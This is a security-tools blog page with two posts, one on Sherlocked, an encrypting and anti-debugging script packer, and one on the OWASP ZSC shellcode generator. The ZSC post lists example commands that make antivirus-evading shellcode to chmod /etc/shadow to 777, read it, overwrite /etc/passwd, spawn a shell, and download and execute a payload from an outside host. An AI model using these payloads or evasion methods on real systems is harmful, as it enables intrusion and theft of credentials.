Showing posts with label Shellcodes. Show all posts
Showing posts with label Shellcodes. Show all posts

Thursday, August 11, 2016

Sherlocked - Transforms any Script into an Executable ELF Protected, Encrypted with Anti-debugging

Posted by Joe Root Posted on 2:29 PM No comments
evil_elf.jpg
This tool or "script universal packer" has a couple of years and is still quite useful ... Sherlocked is a protector of scripts of any kind (python, perl, shell etc.) using a simple XOR with password. Unless the -r option is used, the key is stored encrypted within the binary and run without having to set manually.
Sherlocked basically takes the script, encrypts and saves it as an executable file x86_64 ELF with anti-debugging code (initially stripea of the symbol table and compressed with UPX).
In runtime executable that temporarily decrypts the script and writes it to a random file in / tmp. Then pass the script and command line arguments to the interpreter is released and finally deletes the script.
The only "but" if you use a password file (-r option) is that it does not support arguments cmdline, but could be implemented.
And as we are, to improve you could also use a real encryption stream as SALSA20 rather simple XOR and for AV annoying, modify the stub with gen_shellcode.c to convert a file compiled ./stub stub_shellcode.h .
Compilar:
make
Uso:
./sherlocked [-r]
<infile>     <-> The script file
<outfile>     <-> The protected output file
<key>        <-> The key string used to encrypt the script
[-r]         <-> Require the user who runs the protected executable supplies the key for it to run I.E ./script.elf <key>
Example of use protecting a Python script:
ryan@elfmaster:~/git/sherlocked$ ./script.py
hello I am a python script
ryan@elfmaster:~/git/sherlocked$ ./sherlocked script.py script.elf p4ssw0rd /usr/bin/python -r
[+] The user who executes script.elf must supply password: p4ssw0rd
[+] Encoding payload data
[+] Encoding payload struct
[+] Building msg program
[+] utils/stripx exists, so using it to strip section headers off of DRM archive
[+] /usr/bin/upx exists, so using it to compress script.elf
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   5003224 ->    324236    6.48%  linux/ElfAMD   script.elf                    

Packed 1 file.
Successfully created script.elf
ryan@elfmaster:~/git/sherlocked$ ./script.elf
This message requires that you supply a key to decrypt
ryan@elfmaster:~/git/sherlocked$ ./script.elf p4ssw0rd
hello I am a python script
ryan@elfmaster:~/git/sherlocked$

Read More

Tuesday, August 18, 2015

OWASP ZSC Shellcoder - Generate Customized Shellcodes

Posted by Joe Root Posted on 9:23 AM No comments

OWASP ZSC is an open source software in python language which lets you generate customized shellcodes for listed operation systems. This software can be run on Windows/Linux&Unix/OSX and others OS under python 2.7.x.

Description

Usage of shellcodes

Shellcodesare small codes in assembly which could be use as the payload in software exploiting. Other usages are in malwares, bypassing antiviruses, obfuscated codes and etc.

Why use OWASP ZSC ?

According to other shellcode generators same as metasploit tools and etc, OWASP ZSC using new encodes and methods which antiviruses won't detect. OWASP ZSC encoderes are able to generate shellcodes with random encodes and that's lets you to get thousands new dynamic shellcodes with same job in just a second,that means you will not get a same code if you use random encodes with same commands, And that make OWASP ZSC one of the bests! otherwise it's gonna generate shellcodes for many operation systems in next versions.

Help Menu
Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist   => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-wizard => wizard mod

-update => check for update
-about => about software and developers.
With these switch you can see the oslist,encode types and functions [joblist] to generate your shellcode.
OS List "-oslist
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64
Encode Types "-types
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all
Functions "-joblist
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')

Now you are able to choose your operation system, function, and encode to generate your shellcode, But all of these features are not activated yet, so you have to look up this table HERE to see what features are activated.


For example, this part of table telling us all functions for linux_x86 is activated, But Encodes [xor_random, xor_yourvalue, add_random, add_yourvalue, sub_random, sub_yourvalue, inc, inc_timesyouwant, dec, dec_timesyouwant] are just activated for chmod() function.

Examples
>zsc -os linux_x86 -encode inc -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode inc_10 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec_30 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode xor_0x41414141 -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_0x45872f4d -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_0x41414141 -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_random -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_0x41414141 -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello.txt','hello')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello2.txt','hello[space]world[space]!')" -o file.txt
>zsc -os linux_x86 -encode none -job "dir_create('/root/Desktop/mydirectory')" -o file.txt
>zsc -os linux_x86 -encode none -job "download('http://www.z3r0d4y.com/exploit.type','myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','./myfile.type')" -o file.txt
#multi command
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','chmod[space]777[space]myfile.type;sh[space]myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('script.type','D:\\myfile.type','./script.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('z3r0d4y.sh','/root/z3r0d4y.sh','sh[space]z3r0d4y.sh')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('ali.py','/root/Desktop/0day.py','chmod[space]+x[space]ali.py;[space]python[space]ali.py')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]-la')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]-la[space]/etc/shadow;chmod[space]777[space]/etc/shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/shadow;wget[space]file[space];chmod[space]777[space]file;./file')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('wget[space]file;sh[space]file')" -o file.txt
>zsc -os linux_x86 -encode none -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode none -job "write('/etc/passwd','user:pass')" -o file.txt
>zsc -os linux_x86 -encode none -job "exec('/bin/bash')" -o file.txt
Note: Don’t use space ‘ ’ in system() function, replace it with “[space]” , software will detect and replace “ ” for you in shellcode.
Note: script_executor(),download_execute(),download(),dir_create(),file_create() are using linux command line , not the function. [wget,mkdir,echo] system() function added in script, you can use it to do anything and generate any command line shellcode.
Note: exec() doesn’t support any ARGV same as exec(‘/bin/bash -c ls’) or exec(‘/bin/bash’,‘-c’,‘ls’), you have to wait for next version and this feature will available in system()
Note: you also can use high value for inc and dec time, like inc_100000, your shellcode may get too big
Note: each time you execute chmod()[or any other] function with random encode, you are gonna get random outputs and different shellcode.
Note: your xor value could be anything. “xor_0x41414141” and “xor_0x45872f4d” are examples.

Wizard Switch

With -wizard switch you are able to generate shellcode without long ARGVs, software will ask you for information.

Note: While you are using -wizard switch, if you push “Enter” without typing anything, the default value will be set on the varible.
Note: With entering “list”, List of values will be shown.

Available Features
  • add length calculator for output
  • add filename writer in gcc commandline in output file
  • fixed bug in encoding module not available.
  • fixed bug in os module not available
  • add “-wizard” switch
  • add installer “use ‘zsc’ commandline in terminal after installed”
  • add uninstaller
  • This Software just could be run on linux since this version
  • change output to .c file and automated shellcode generating
  • add color output for termina
  • add inc encoding chmod() [linux_x86]
  • add inc_timesyouwant chmod() [linux_x86]
  • add dec encoding chmod() [linux_x86]
  • add dec_timesyouwant chmod() [linux_x86]
  • add features table inside “features_table.html”
  • add -about to menu for developers name and etc
  • fixed permission number calculating in chmod() [linux_x86]
  • software’s signature changes
  • bug fix reported by user in executing on linux , color function
  • add xor_random encoding chmod() [linux_x86]
  • add xor_yourvalue encoding chmod() [linux_x86]
  • add add_random encoding chmod() [linux_x86]
  • add add_yourvalue encoding chmod() [linux_x86]
  • add sub_random encoding chmod() [linux_x86]
  • add sub_yourvalue encoding chmod() [linux_x86]
  • fixed shellcode encode type checking
  • [linux_x86 modules completed]
  • add script_executor() [linux - using command execution]
  • add download_execute() [linux_x86 - using command execution (wget)]
  • add download() [linux_x86 - using command execution (wget)]
  • add dir_create() [linux_x86 using command execution]
  • add file_create() [linux_x86 using command execution]
  • add encodes file for next version released
  • add system() [linux_x86 command execute]
  • fixed chmod filename ¼ char length [linux_x86]
  • fixed exec filename ¼ char length [linux_x86]
  • fixed write filename ¼ length [linux_x86]
  • fixed write content ¼ length [linux_x86]
  • fixed write length calculator [linux_x86]
  • and fixed some other bugs in coding [core]
  • system() function added in script, you can use it to do anything and generate any command line shellcode.
  • add chmod() [linux_x86] -> chmod(‘/path/file’,‘perm_num’)
  • add write() [linux_x86] -> write(‘/path/file’,‘content’)
  • add exec() [linux_x86] -> exec(‘/path/file’)
  • add encode [none - all os]
  • add mix_all encoding in chmod() [linux_x86]
  • add xor_random encoding in system() [linux_x86]
  • add xor_yourvalue encoding in system() [linux_x86]
  • add add_random encoding in system() [linux_x86]
  • add add_yourvalue encoding in system() [linux_x86]
  • add sub_random encoding in system() [linux_x86
  • add sub_yourvalue encoding in system() [linux_x86]
  • add inc encoding in system() [linux_x86]
  • add inc_timesyouwant encoding in system() [linux_x86
  • add dec encoding in system() [linux_x86]
  • add dec_timesyouwant encoding in system() [linux_x86]
  • add mix_all encoding in system() [linux_x86]
  • add xor_random encoding in file_create() [linux_x86]
  • add xor_yourvalue encoding in file_create() [linux_x86]
  • add add_random encoding in file_create() [linux_x86]
  • add add_yourvalue encoding in file_create() [linux_x86]
  • add sub_random encoding in file_create() [linux_x86
  • add sub_yourvalue encoding in file_create() [linux_x86]
  • add inc encoding in file_create() [linux_x86]
  • add inc_timesyouwant encoding in file_create() [linux_x86
  • add dec encoding in file_create() [linux_x86]
  • add dec_timesyouwant encoding in file_create() [linux_x86]
  • add mix_all encoding in file_create() [linux_x86]
  • add xor_random encoding in dir_create() [linux_x86]
  • add xor_yourvalue encoding in dir_create() [linux_x86]
  • add add_random encoding in dir_create() [linux_x86]
  • add add_yourvalue encoding in dir_create() [linux_x86]
  • add sub_random encoding in dir_create() [linux_x86
  • add sub_yourvalue encoding in dir_create() [linux_x86]
  • add inc encoding in dir_create() [linux_x86]
  • add inc_timesyouwant encoding in dir_create() [linux_x86
  • add dec encoding in dir_create() [linux_x86]
  • add dec_timesyouwant encoding in dir_create() [linux_x86]
  • add mix_all encoding in dir_create() [linux_x86]
  • add xor_random encoding in download() [linux_x86]
  • add xor_yourvalue encoding in download() [linux_x86]
  • add add_random encoding in download() [linux_x86]
  • add add_yourvalue encoding in download() [linux_x86]
  • add sub_random encoding in download() [linux_x86
  • add sub_yourvalue encoding in download() [linux_x86]
  • add inc encoding in download() [linux_x86]
  • add inc_timesyouwant encoding in download() [linux_x86
  • add dec encoding in download() [linux_x86]
  • add dec_timesyouwant encoding in download() [linux_x86]
  • add mix_all encoding in download() [linux_x86]
  • add xor_random encoding in download_execute() [linux_x86]
  • add xor_yourvalue encoding in download_execute() [linux_x86]
  • add add_random encoding in download_execute() [linux_x86]
  • add add_yourvalue encoding in download_execute() [linux_x86]
  • add sub_random encoding in download_execute() [linux_x86
  • add sub_yourvalue encoding in download_execute() [linux_x86]
  • add inc encoding in download_execute() [linux_x86]
  • add inc_timesyouwant encoding in download_execute() [linux_x86
  • add dec encoding in download_execute() [linux_x86]
  • add dec_timesyouwant encoding in download_execute() [linux_x86]
  • add mix_all encoding in download_execute() [linux_x86]
  • add xor_random encoding in system() [linux_x86]
  • add xor_yourvalue encoding in system() [linux_x86]
  • add add_random encoding in system() [linux_x86]
  • add add_yourvalue encoding in system() [linux_x86]
  • add sub_random encoding in system() [linux_x86
  • add sub_yourvalue encoding in system() [linux_x86]
  • add inc encoding in system() [linux_x86]
  • add inc_timesyouwant encoding in system() [linux_x86
  • add dec encoding in system() [linux_x86]
  • add dec_timesyouwant encoding in system() [linux_x86]
  • add mix_all encoding in system() [linux_x86]
  • add xor_random encoding in script_executor() [linux_x86]
  • add xor_yourvalue encoding in script_executor() [linux_x86]
  • add add_random encoding in script_executor() [linux_x86]
  • add add_yourvalue encoding in script_executor() [linux_x86]
  • add sub_random encoding in script_executor() [linux_x86
  • add sub_yourvalue encoding in script_executor() [linux_x86]
  • add inc encoding in script_executor() [linux_x86]
  • add inc_timesyouwant encoding in script_executor() [linux_x86
  • add dec encoding in script_executor() [linux_x86]
  • add dec_timesyouwant encoding in script_executor() [linux_x86]
  • add mix_all encoding in script_executor() [linux_x86]
  • add add_random encoding in write() [linux_x86]
  • add xor_random encoding in write() [linux_x86]
  • add sub_random encoding in write() [linux_x86]
  • add xor_random encoding in exec() [linux_x86]
  • add sub_random encoding in exec() [linux_x86
  • add add_random encoding in exec() [linux_x86]
  • fixed bug in system() when len(command) is less than 5
  • fixed bug in encode module add_random chmod() [linux_x86] 

DOWNLOAD LINK - WEBSITE

Read More
Subscribe to: Posts (Atom)